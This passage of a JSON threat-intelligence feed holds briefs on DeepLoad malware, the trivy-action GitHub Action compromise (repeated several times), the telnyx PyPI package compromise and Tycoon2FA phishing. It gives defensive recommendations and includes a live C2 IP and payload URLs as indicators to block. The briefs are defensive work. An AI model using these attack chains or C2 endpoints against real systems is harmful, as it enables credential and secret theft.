\u003ccode\u003eLockAppHost.exe\u003c/code\u003e process to further blend into trusted Windows activity and evade detection by security tools. The threat actor\u0026rsquo;s motivations appear to be financially driven, focusing on credential and cryptocurrency theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim encounters a fake browser error message.\u003c/li\u003e\n\u003cli\u003eThe victim is instructed to paste a command into Windows Run or a terminal.\u003c/li\u003e\n\u003cli\u003eThe command executes a PowerShell loader, which is designed for persistence.\u003c/li\u003e\n\u003cli\u003eThe PowerShell loader drops a DLL component in the Temp directory, compiled on every execution with a different filename.\u003c/li\u003e\n\u003cli\u003eThe loader disables PowerShell command history and calls Windows core functions directly to evade monitoring.\u003c/li\u003e\n\u003cli\u003eThe DLL is injected into \u003ccode\u003eLockAppHost.exe\u003c/code\u003e using asynchronous procedure call (APC) injection.\u003c/li\u003e\n\u003cli\u003eDeepLoad steals credentials via a standalone credential stealer executed alongside the main loader.\u003c/li\u003e\n\u003cli\u003eA rogue browser extension is dropped to intercept user activity, including logins, open tabs, session tokens, and saved passwords. The malware also attempts to spread via USB drives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful DeepLoad infections can lead to significant credential theft, potentially compromising sensitive user accounts and data. The rogue browser extension can expose all user browser activity, including banking and cryptocurrency exchanges. The spread via USB drives allows the malware to propagate rapidly across an organization. The financial impact can be substantial if cryptocurrency wallets and other financial accounts are compromised. The number of affected organizations is currently unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect DeepLoad PowerShell Loader\u0026rdquo; Sigma rule to detect the initial PowerShell execution used to deliver the malware.\u003c/li\u003e\n\u003cli\u003eMonitor process injection into \u003ccode\u003eLockAppHost.exe\u003c/code\u003e to identify potential DeepLoad infections (reference the Sigma rule \u0026ldquo;Detect Injection into LockAppHost.exe\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eEnable PowerShell logging and review for suspicious command line arguments indicative of the DeepLoad loader to enhance the effectiveness of the \u0026ldquo;Detect DeepLoad PowerShell Loader\u0026rdquo; rule.\u003c/li\u003e\n\u003cli\u003eImplement USB drive security policies to prevent the spread of malware via removable media.\u003c/li\u003e\n\u003cli\u003eEducate users on the risks of executing commands from untrusted sources to prevent initial infection via ClickFix techniques.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T12:00:00Z","date_published":"2026-04-02T12:00:00Z","id":"/briefs/2026-04-deepload-malware/","summary":"The DeepLoad malware steals credentials, installs malicious browser extensions, spreads via USB drives, and is being distributed via ClickFix campaigns using PowerShell loaders.","title":"DeepLoad Malware Distributed via ClickFix","url":"https://feed.craftedsignal.io/briefs/2026-04-deepload-malware/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner\u0026rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.\u003c/li\u003e\n\u003cli\u003eStolen credentials are exfiltrated to a destination controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview your GitHub Actions workflows for usage of \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and verify the integrity of the action\u0026rsquo;s code. Consider pinning to specific commit SHAs instead of tags to avoid tag repointing attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runner environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T08:36:29Z","date_published":"2026-03-31T08:36:29Z","id":"/briefs/2026-04-trivy-supply-chain/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe attacker retroactively modifies existing Git tags (e.g., \u003ccode\u003e0.24.0\u003c/code\u003e) to point to a malicious commit.\u003c/li\u003e\n\u003cli\u003eThe malicious commit injects approximately 105 lines of malicious code into the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, prepended before the legitimate Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eA GitHub Actions workflow includes a step using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e by referencing a poisoned tag (e.g., \u003ccode\u003e- uses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious code in \u003ccode\u003eentrypoint.sh\u003c/code\u003e enumerates running processes to identify potential credential sources and exfiltrates sensitive data.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner executes, masking the malicious activity.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacted organizations using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action\u0026rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately audit your GitHub Actions workflows for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and update to a safe version (as provided by Aqua Security) or remove the action entirely.\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.\u003c/li\u003e\n\u003cli\u003eEnable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.\u003c/li\u003e\n\u003cli\u003eReview GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T07:24:09Z","date_published":"2026-03-31T07:24:09Z","id":"/briefs/2026-04-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script to include malicious code for credential theft. Specifically, the attacker prepends approximately 105 lines of malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to retroactively poison existing release tags (e.g., \u003ccode\u003e@0.24.0\u003c/code\u003e) to point to the malicious commit.\u003c/li\u003e\n\u003cli\u003eDevelopers\u0026rsquo; CI/CD pipelines reference the compromised \u003ccode\u003etrivy-action\u003c/code\u003e using a poisoned tag (e.g., \u003ccode\u003eaquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a workflow runs, the GitHub Actions runner downloads and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, granting it access to the runner\u0026rsquo;s environment, secrets, and network.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential targets for credential theft.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates credentials and secrets.\u003c/li\u003e\n\u003cli\u003eThe original \u003ccode\u003etrivy\u003c/code\u003e scanner is executed, masking the malicious activity and allowing the workflow to complete normally.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etrivy-action\u003c/code\u003e GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of \u003ccode\u003etrivy-action\u003c/code\u003e, the potential impact is significant. Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipeline configurations for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security\u0026rsquo;s advisories.\u003c/li\u003e\n\u003cli\u003eImplement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T06:07:07Z","date_published":"2026-03-31T06:07:07Z","id":"/briefs/2026-04-trivy-action-compromise/","summary":"The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","pypi","credential-theft","teampcp"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the \u003ccode\u003etelnyx\u003c/code\u003e Python package on PyPI was compromised by TeamPCP, resulting in the distribution of malicious versions 4.87.1 and 4.87.2. The attacker, having gained unauthorized access to PyPI credentials, bypassed the legitimate GitHub release pipeline to upload these compromised packages directly. These versions contain malware designed to harvest sensitive credentials from infected systems and exfiltrate them to a command-and-control (C2) server. The malicious packages were available for approximately 6 hours before being quarantined by PyPI. Version 4.87.1 contained a typo preventing execution, making 4.87.2 the fully functional malicious version. This incident highlights the risk of supply chain attacks targeting open-source package repositories, potentially affecting any system that installed the \u003ccode\u003etelnyx\u003c/code\u003e package during the exposure window.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to PyPI credentials for the \u003ccode\u003etelnyx\u003c/code\u003e package.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads malicious versions 4.87.1 and 4.87.2 of the \u003ccode\u003etelnyx\u003c/code\u003e package to PyPI, bypassing the legitimate GitHub repository.\u003c/li\u003e\n\u003cli\u003eWhen a user installs or upgrades to the malicious \u003ccode\u003etelnyx\u003c/code\u003e package, the injected malware within \u003ccode\u003etelnyx/_client.py\u003c/code\u003e executes upon importing the library (\u003ccode\u003eimport telnyx\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eOn Linux/macOS systems, the malware spawns a detached subprocess to ensure persistence and downloads a payload hidden inside a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from the C2 server at \u003ccode\u003ehttp://83.142.209.203:8080/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload harvests sensitive credentials, including SSH keys, AWS/GCP/Azure credentials, Kubernetes tokens, Docker configurations, .env files, database credentials, and crypto wallets.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes access is detected, the malware deploys privileged pods to all nodes for lateral movement within the Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eThe collected data is encrypted using AES-256-CBC and RSA-4096, then exfiltrated to the C2 server, identified by the header \u003ccode\u003eX-Filename: tpcp.tar.gz\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eOn Windows, a binary payload hidden in \u003ccode\u003ehangup.wav\u003c/code\u003e is downloaded from \u003ccode\u003ehttp://83.142.209.203:8080/\u003c/code\u003e, dropped as \u003ccode\u003emsbuild.exe\u003c/code\u003e in the Startup folder for persistence, and executed with a hidden window, polling the endpoint \u003ccode\u003ehttp://83.142.209.203:8080/raw\u003c/code\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etelnyx\u003c/code\u003e PyPI package poses a significant risk to developers and organizations that use the library.  Successful exploitation leads to the theft of sensitive credentials, potentially granting the attacker unauthorized access to critical infrastructure, cloud resources, and sensitive data. TeamPCP\u0026rsquo;s previous campaign against LiteLLM and the similarities in this attack suggest a pattern of targeting open-source projects to infiltrate developer environments and steal secrets.  The impact includes potential data breaches, financial losses, and reputational damage. The exposure window was approximately 6 hours during which vulnerable versions were available.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately check for the presence of malicious \u003ccode\u003etelnyx\u003c/code\u003e package versions (4.87.1 or 4.87.2) in your environment using the provided commands and uninstall them (\u003ccode\u003epip uninstall telnyx\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDue to the credential-stealing nature of the malware, rotate all potentially exposed secrets, including SSH keys, cloud provider credentials (AWS, GCP, Azure), Kubernetes tokens, Docker registry credentials, database passwords, API keys in .env files, and Telnyx API keys.\u003c/li\u003e\n\u003cli\u003eCheck for persistence mechanisms used by the malware, specifically the \u003ccode\u003eaudiomon\u003c/code\u003e service and associated files on Linux/macOS, and the \u003ccode\u003emsbuild.exe\u003c/code\u003e executable in the Startup folder on Windows, based on the file paths provided in the \u0026ldquo;Filesystem\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eBlock the identified C2 IP address (\u003ccode\u003e83.142.209.203\u003c/code\u003e) and payload URLs (\u003ccode\u003ehttp://83.142.209.203:8080/ringtone.wav\u003c/code\u003e, \u003ccode\u003ehttp://83.142.209.203:8080/hangup.wav\u003c/code\u003e, \u003ccode\u003ehttp://83.142.209.203:8080/raw\u003c/code\u003e) at your network perimeter.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect the creation of \u003ccode\u003emsbuild.exe\u003c/code\u003e in the Startup folder.\u003c/li\u003e\n\u003cli\u003ePin the \u003ccode\u003etelnyx\u003c/code\u003e package to the safe version 4.87.0 in your project dependencies to prevent future installations of compromised versions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T19:15:30Z","date_published":"2026-03-30T19:15:30Z","id":"/briefs/2026-03-telnyx-pypi-compromise/","summary":"A threat actor compromised the PyPI package `telnyx`, uploading malicious versions 4.87.1 and 4.87.2 containing credential-stealing malware that exfiltrates data to a C2 server.","title":"Compromised Telnyx PyPI Package Distributes Credential-Stealing Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-telnyx-pypi-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike\u0026rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains write access to the aquasecurity/trivy-action repository.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.\u003c/li\u003e\n\u003cli\u003eA developer\u0026rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., uses: \u003ca href=\"mailto:aquasecurity/trivy-action@0.24.0\"\u003eaquasecurity/trivy-action@0.24.0\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential credential sources.\u003c/li\u003e\n\u003cli\u003eThe script steals credentials and secrets from the runner\u0026rsquo;s environment, including API keys, deployment tokens, and cloud credentials.\u003c/li\u003e\n\u003cli\u003eAfter stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are used to gain unauthorized access to internal infrastructure and resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).\u003c/li\u003e\n\u003cli\u003eConsider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T06:24:43Z","date_published":"2026-03-30T06:24:43Z","id":"/briefs/2026-03-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 4, 2026, Europol announced a technical disruption of Tycoon2FA, a subscription-based phishing-as-a-service (PhaaS) platform enabling cybercriminals to bypass MFA and compromise email accounts. The takedown involved seizing 330 domains. Despite this disruption, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and Tycoon2FA’s tactics, techniques, and procedures (TTPs) remain unchanged. This resurgence suggests that the actors behind Tycoon2FA are adaptive and persistent. Tycoon2FA began operations in 2023, and in mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. The platform also had a competitor named RaccoonO365, which law enforcement took down in September 2025.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictims receive phishing emails designed to mimic legitimate login pages.\u003c/li\u003e\n\u003cli\u003ePhishing emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.\u003c/li\u003e\n\u003cli\u003eUpon CAPTCHA validation, victims\u0026rsquo; session cookies are stolen by the attackers.\u003c/li\u003e\n\u003cli\u003eA JavaScript (JS) file extracts victims\u0026rsquo; email addresses.\u003c/li\u003e\n\u003cli\u003eVictims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.\u003c/li\u003e\n\u003cli\u003eVictims enter their credentials into the fake login pages, which are then captured by the attackers.\u003c/li\u003e\n\u003cli\u003eStolen credentials are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.\u003c/li\u003e\n\u003cli\u003eAttackers authenticate to the victim\u0026rsquo;s cloud environment using the stolen cookies and credentials, gaining unauthorized access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eTycoon2FA was responsible for 62% of all phishing attempts blocked by Microsoft in mid-2025, generating over 30 million malicious emails in a single month. Successful attacks lead to unauthorized access to victims\u0026rsquo; cloud environments, potentially resulting in data theft, business email compromise (BEC), and further malicious activities. Despite law enforcement takedowns, the platform\u0026rsquo;s rapid resurgence demonstrates the resilience of PhaaS operations and their potential for significant damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for connections to known phishing domains or newly registered domains, correlating with user agent strings and HTTP referrer headers common in phishing kits, to detect initial access attempts. Deploy the network_connection Sigma rule to identify suspicious connections.\u003c/li\u003e\n\u003cli\u003eImplement detections for suspicious JavaScript execution within browser environments attempting to steal session cookies or extract email addresses. Enable webserver and proxy logging to capture these events and deploy the process_creation Sigma rule to identify associated processes.\u003c/li\u003e\n\u003cli\u003eMonitor authentication logs for successful logins from unusual locations or using suspicious user agents after a user has visited a known phishing site. Analyze user authentication patterns and correlate with other security events to detect compromised accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-29T08:34:23Z","date_published":"2026-03-29T08:34:23Z","id":"/briefs/2026-03-tycoon2fa-persistence/","summary":"The Tycoon2FA phishing-as-a-service (PhaaS) platform, used to bypass MFA and compromise email accounts, saw a temporary decrease in activity after a law enforcement takedown, but cloud compromises have since returned to pre-disruption levels with unchanged TTPs, indicating continued threat actor activity.","title":"Tycoon2FA Phishing-as-a-Service Platform Persists After Takedown","url":"https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-persistence/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","pypi","credential theft","steganography"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the Telnyx package on the Python Package Index (PyPI) was compromised by the threat actor TeamPCP. Malicious versions 4.87.1 and 4.87.2 were uploaded, containing credential-stealing malware concealed within WAV audio files. This supply-chain attack targeted developers using the Telnyx Python SDK, a popular package with over 740,000 monthly downloads, used for integrating communication services into applications. The malicious code resides in the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file and executes upon import. The compromise is believed to have originated from stolen credentials for the publishing account on the PyPI registry. TeamPCP has been linked to previous supply-chain attacks and wiper campaigns against Iranian systems, highlighting the group\u0026rsquo;s focus on disrupting software development and infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the Telnyx PyPI account, likely through credential theft.\u003c/li\u003e\n\u003cli\u003eMalicious versions 4.87.1 and 4.87.2 of the Telnyx package are published to PyPI.\u003c/li\u003e\n\u003cli\u003eWhen a developer installs the compromised Telnyx package, the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file is executed upon import.\u003c/li\u003e\n\u003cli\u003eOn Linux and macOS, a detached process is spawned to download a second-stage payload disguised as a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eSteganography is used to hide malicious code within the WAV file\u0026rsquo;s data frames.\u003c/li\u003e\n\u003cli\u003eThe embedded payload is extracted using an XOR-based decryption routine and executed in memory.\u003c/li\u003e\n\u003cli\u003eThe malware harvests sensitive data, including SSH keys, credentials, cloud tokens, cryptocurrency wallets, and environment 